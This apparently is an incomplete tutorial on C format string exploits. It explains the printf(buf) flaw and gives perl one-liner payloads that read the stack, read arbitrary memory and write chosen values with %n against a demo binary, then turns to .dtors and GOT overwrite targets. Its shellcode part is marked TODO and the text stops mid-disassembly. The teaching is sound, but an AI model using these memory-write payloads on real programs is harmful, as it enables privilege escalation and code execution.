Format String Exploits
1 - A history lesson
Buffer Overflows have been around since the mid 80's. THE doc on stack
overflows was written in:
P H R A C K 4 9
November 08, 1996
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Smashing The Stack For Fun And Profit
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
by Aleph One
Since the discovery of buffer overflows there have been a few thousand in the
wild.
Format string explots have were made public in June 1999. There have only
been a few dozen seen.
Application Found by Impact years
-------------------------------------------------------------------------
wu-ftpd 2.* security.is remote root > 6
Linux rpc.statd security.is remote root > 4
IRIX telnetd LSD remote root > 8
Qualcomm Popper 2.53 security.is remote user > 3
Apache + PHP3 security.is remote user > 2
NLS / locale CORE SDI local root ?
screen Jouko Pynnonen local root > 5
BSD chpass TESO local root ?
OpenBSD fstat ktwo local root ?
(Table taken from: http://www.cs.ucsb.edu/~jzhou/security/formats-teso.html )
2 - What is a format string?
- Question: How do you output data in a C program?
answer
- Let's take a look at an example of format strings in action.
example1
3 - Malformed Format Strings
- Recall from example1 the use of the %x format string.
It prints in hex the data located in the memory of the
appropriate argument to the printf() call.
- Question: What happens when the number of format strings and the number
of arguments are not equal??
answer
- What does this really mean? Well... let's see the code:
example2
- Where exactly is the data that's being read? If you've been paying
attention to the other talks, you should know this... But if I have to
spell it out for you...
When printf("%d %08x.%08x.%08x.%08x.%08x.%08x.%08x.", i); is
called, just like any other function, it's arguments are pushed onto the
stack, followed by the return address of the function, saved frame pointer,
and local variables to that function.
Below is a (hopefully) familiar diagram of the stack when printf() is
called (note that the stack grows down in the figure):
+---------+
| old |
+---------+
| data |
+---------+ <- 'top' of stack before call to printf()
| i |
+---------+
| fmt_str |
+---------+
| ret |
+---------+
| sfp |
+---------+ <- 'top' of stack after call to printf()
The first %d looks at the memory location that the first argument
*should* be at, in this case 'i' is located there. The next %08x will
look at the next memory location on the stack, where it expects to find
the 2nd argument... instead it finds old data left on the stack from
before the function call.
- That's great, but who cares?
It is unlikely that a programmer will string together a ton of %x for no
reason except to let you view the contents of the stack. But there is
something a programmer might do...
4 - The vulnerablitiy
- The right way to print a string:
printf("%s", buf);
- The wrong way to print a string:
printf(buf);
See: example3
- When a programmer makes the mistake of letting you control the format
strings, all hell breaks loose...
We can read from the stack above us as before:
./a.out `perl -e 'print "%08x."x40;'`
Notice the bytes: 0x25 0x30 0x38 0x78 0x2e are repeated quite a lot. These bytes are
actually the ASCII characters: %08x. Since the string passed to printf() is
stored on the stack before the call is made (in our case into the buffer
'text'), eventually we will be reading the memory of the format string itself.
This is a *good* thing.
- What would happen if instead of using so many %08x we put something
useful at the start of our format string?
./a.out `perl -e 'print "\x7d\xfb\xff\xbf"'`%08x.%08x.%08x.%s
We can now read from arbitrary memory locations!
- But wait, there's more... remember our friend %n ? What we did with %s
for reading, we can do with %n for writting.
If you remember the line:
** test_num @ 0x080496dc = -72 = 0xffffffb8
We will now use it's address as a location to write to...
./a.out `perl -e 'print "\xdc\x96\x04\x08"'`%08x.%08x.%08x.%n
The %n will write it whatever address we pass it the number of bytes
printed up to that point. In this case it outputs:
** test_num @ 0x080496dc = 31 = 0x0000001f
What is this 31?? So, our string we passed to printf has "\xdc\x96\x04\x08"
which is 4 bytes. And then if you were paying attention to what is
printed by %08x you would see that it prints 8 characters. 8 x 3 = 24,
plus the 3 `.' characters. 24 + 3 + 4 = 31
We can change the field width of %x to any number we want to control
what gets written by %n.
./a.out `perl -e 'print "\xdc\x96\x04\x08"'`%08x.%08x.%080x.%n
** test_num @ 0x080496dc = 103 = 0x00000067
- What we can do now is write to any arbitrary memory location. But writing
the number of %08x and other crap in our format string isn't that useful...
or is it?
If we want to write somthing like 0xDDCCBBAA, which is the format of a
memory address. We can use mulitple calls to %n, at 4 consecutive
bytes. Doing so we can overlap small values byte by byte, instead of
trying to write a gigantic number of bytes to the screen or file.
Conceptually it looks like this:
AA 00 00 00 | 0x080496dc
BB 00 00 00 | 0x080496dd
CC 00 00 00 | 0x080496de
DD 00 00 00 | 0x080496df
----------------------|
AA BB CC DD | Result starting at 0x080496dc
After re-writing this in the correct byte order: 0xDDCCBBAA
In code we need to specify each address we want to write to, and put
four %n to write data to each location.
./a.out `perl -e 'print "\xdc\x96\x04\x08JUNK\xdd\x96\x04\x08"'`%x.%x.%146x.%n%017x%n
The reason for JUNK is becase we need to specify a %x in between each %n to
increment the value that will be written. The above example will write
0x0000bbaa to test_val
I will leave the task of writing all four bytes as an exercise for the
reader.
- Now, what if we want to write a more legit looking address: 0x0806abcd
Well first we need to print 205 bytes (0xcd) total, for the first %n, then
we need to print a total of 171 bytes (0xab) ... What's wrong with this?
It should be obvious...
answer
5 - A better way
- Direct Parameter Access allows us to eliminate a lot of the JUNK (pun
intended).
An example of direct parameter access:
printf("Argument 7: %7$d, Argument 2: %2$d \n", 10, 20, 30, 40, 50, 60, 70, 80);
By using %7$d, we tell this particular format string to access the
memory for the 7th argument. We can now re-write our previous example:
./a.out `perl -e 'print "\xdc\x96\x04\x08\xdd\x96\x04\x08"'`%3\$161x.%4\$n%3\$17x%5\$n
6 - The Exploit
- So, we can read from and write to any memory address we want. What and
Where do we want to write? Well.. if you want, you can overwrite the
return address of the stack frame above you just like a stack overflow.
But with format strings we're not limited by the same contraints as some
overflow. We can choose to overwrite sections of memory that are more
predictible...
- Thus enters dtors. GCC compiled programs contain two special
sections called .ctors and .dtors. These secions are made for
constructors and destructors. But wait, C doesn't have constructors and
destructors you fool... well, not in the object oriented sense, no.. but
they do let you write functions that are called just before main starts, and
just after it exits.
See: example4
Lets take a look at the symbols...
$ nm a.out
080495f0 A __bss_start
08048330 t call_gmon_start
080483e6 t cleanup
080495f0 b completed.4577
080494e8 d __CTOR_END__
080494e4 d __CTOR_LIST__
080495e4 D __data_start
080495e4 W data_start
08048464 t __do_global_ctors_aux
08048354 t __do_global_dtors_aux
080495e8 D __dso_handle
080494f4 d __DTOR_END__
080494ec d __DTOR_LIST__
080494fc D _DYNAMIC
080495f0 A _edata
080495f4 A _end
U exit@@GLIBC_2.0
0804848c T _fini
080494e4 A __fini_array_end
080494e4 A __fini_array_start
080484a8 R _fp_hw
08048388 t frame_dummy
080484e0 r __FRAME_END__
080495c8 D _GLOBAL_OFFSET_TABLE_
w __gmon_start__
080482a4 T _init
080494e4 A __init_array_end
080494e4 A __init_array_start
080484ac R _IO_stdin_used
080494f8 d __JCR_END__
080494f8 d __JCR_LIST__
w _Jv_RegisterClasses
0804845c T __libc_csu_fini
08048400 T __libc_csu_init
U __libc_start_main@@GLIBC_2.0
080483b0 T main
080495ec d p.4576
080494e4 A __preinit_array_end
080494e4 A __preinit_array_start
U puts@@GLIBC_2.0
0804830c T _start
$ objdump -s -j .dtors ./a.out
./a.out: file format elf32-i386
Contents of section .dtors:
80494ec ffffffff e6830408 00000000 ............
As you can see, the nm command shows you where the address of the start and
end of dtors. And taking the objdump output of the .dtors section, you can
see that the address of __DTOR_LIST__ is the start of .dtors, this address
also always contains ffffffff. __DTOR_END__ shows the address of the end
of the .dtors section (also always 00000000). In between the two address
is the addres of our cleanup function.
$ objdump -h ./a.out
./a.out: file format elf32-i386
Sections:
Idx Name Size VMA LMA File off Algn
0 .interp 00000013 08048114 08048114 00000114 2**0
CONTENTS, ALLOC, LOAD, READONLY, DATA
1 .note.ABI-tag 00000020 08048128 08048128 00000128 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
2 .hash 00000030 08048148 08048148 00000148 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
3 .dynsym 00000070 08048178 08048178 00000178 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
4 .dynstr 00000063 080481e8 080481e8 000001e8 2**0
CONTENTS, ALLOC, LOAD, READONLY, DATA
5 .gnu.version 0000000e 0804824c 0804824c 0000024c 2**1
CONTENTS, ALLOC, LOAD, READONLY, DATA
6 .gnu.version_r 00000020 0804825c 0804825c 0000025c 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
7 .rel.dyn 00000008 0804827c 0804827c 0000027c 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
8 .rel.plt 00000020 08048284 08048284 00000284 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
9 .init 00000017 080482a4 080482a4 000002a4 2**2
CONTENTS, ALLOC, LOAD, READONLY, CODE
10 .plt 00000050 080482bc 080482bc 000002bc 2**2
CONTENTS, ALLOC, LOAD, READONLY, CODE
11 .text 00000180 0804830c 0804830c 0000030c 2**2
CONTENTS, ALLOC, LOAD, READONLY, CODE
12 .fini 0000001a 0804848c 0804848c 0000048c 2**2
CONTENTS, ALLOC, LOAD, READONLY, CODE
13 .rodata 00000037 080484a8 080484a8 000004a8 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
14 .eh_frame 00000004 080484e0 080484e0 000004e0 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
15 .ctors 00000008 080494e4 080494e4 000004e4 2**2
CONTENTS, ALLOC, LOAD, DATA
16 .dtors 0000000c 080494ec 080494ec 000004ec 2**2
CONTENTS, ALLOC, LOAD, DATA
17 .jcr 00000004 080494f8 080494f8 000004f8 2**2
CONTENTS, ALLOC, LOAD, DATA
18 .dynamic 000000c8 080494fc 080494fc 000004fc 2**2
CONTENTS, ALLOC, LOAD, DATA
19 .got 00000004 080495c4 080495c4 000005c4 2**2
CONTENTS, ALLOC, LOAD, DATA
20 .got.plt 0000001c 080495c8 080495c8 000005c8 2**2
CONTENTS, ALLOC, LOAD, DATA
21 .data 0000000c 080495e4 080495e4 000005e4 2**2
CONTENTS, ALLOC, LOAD, DATA
22 .bss 00000004 080495f0 080495f0 000005f0 2**2
ALLOC
23 .comment 0000010e 00000000 00000000 000005f0 2**0
CONTENTS, READONLY
The above objdump shows the section headers, notice that .dtors is not
READONLY. So, what we can do is use our format string exploit to overwrite
the .dtor section and put a call to some shellcode.
TODO: Working example.
- The Global Offset Table
$ objdump -d -j
.plt c.out
c.out: file format elf32-i386
Disassembly of section .plt:
08048304 :
8048304: ff 35 e0 96 04 08 pushl 0x80496e0
804830a: ff 25 e4 96 04 08 jmp *0x80496e4
8048310: 00 00 add %al,(%eax)
...
08048314 :
8048314: ff 25 e8 96 04 08 jmp *0x80496e8
804831a: 68 00 00 00 00 push $0x0
804831f: e9 e0 ff ff ff jmp 8048304 <_init+0x18>
08048324 <__libc_start_main@plt>:
8048324: ff 25 ec 96 04 08 jmp *0x80496ec
804832a: 68 08 00 00 00 push $0x8
804832f: e9 d0 ff ff ff jmp 8048304 <_init+0x18>
08048334 :
8048334: ff 25 f0 96 04 08 jmp *0x80496f0
804833a: 68 10 00 00 00 push $0x10
804833f: e9 c0 ff ff ff jmp 8048304 <_init+0x18>
08048344 :
8048344: ff 25 f4 96 04 08 jmp *0x80496f4
804834a: 68 18 00 00 00 push $0x18
804834f: e9 b0 ff ff ff jmp 8048304 <_init+0x18>
08048354 <__gmon_start__@plt>:
8048354: ff 25 f8 96 04 08 jmp *0x80496f8
804835a: 68 20 00 00 00 push $0x20
804835f: e9 a0 ff ff ff jmp 8048304 <_init+0x18>
08048364 :
8048364: ff 25 fc 96 04 08 jmp *0x80496fc
804836a: 68 28 00 00 00 push $0x28
804836f: e9 90 ff ff ff jmp 8048304 <_init+0x18>